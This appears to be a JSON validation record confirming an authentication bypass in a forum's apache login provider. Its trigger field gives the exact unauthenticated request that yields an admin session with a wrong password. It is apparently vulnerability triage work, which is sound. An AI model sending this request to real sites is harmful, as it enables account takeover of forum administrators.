{
  "claim_outcome": "confirmed",
  "claim_block_reason": null,
  "repro_result": "confirmed",
  "validated_surface": "api_remote",
  "evidence_scope": "production_path",
  "claimed_impact_class": "authz_bypass",
  "observed_impact_class": "authz_bypass",
  "exploitability_confidence": "high",
  "attacker_controlled_input": "auth_provider=apache request parameter plus HTTP Basic Authorization header (PHP_AUTH_USER set to any existing username, e.g. admin); password deliberately wrong (x)",
  "trigger_path": "Single unauthenticated POST to ucp.php?mode=login_link&auth_provider=apache&login_link_aikido=1 with header Authorization: Basic base64(admin:x) and body login_username=admin&login_password=x&login=Login -> apache provider returns LOGIN_SUCCESS without password check -> session_create(admin user_id=2)",
  "end_to_end_target_reached": true,
  "sanitizer_used": false,
  "crash_observed": false,
  "read_write_primitive_observed": false,
  "exploit_chain_demonstrated": true,
  "blocking_mitigation": null,
  "inferred": false
}
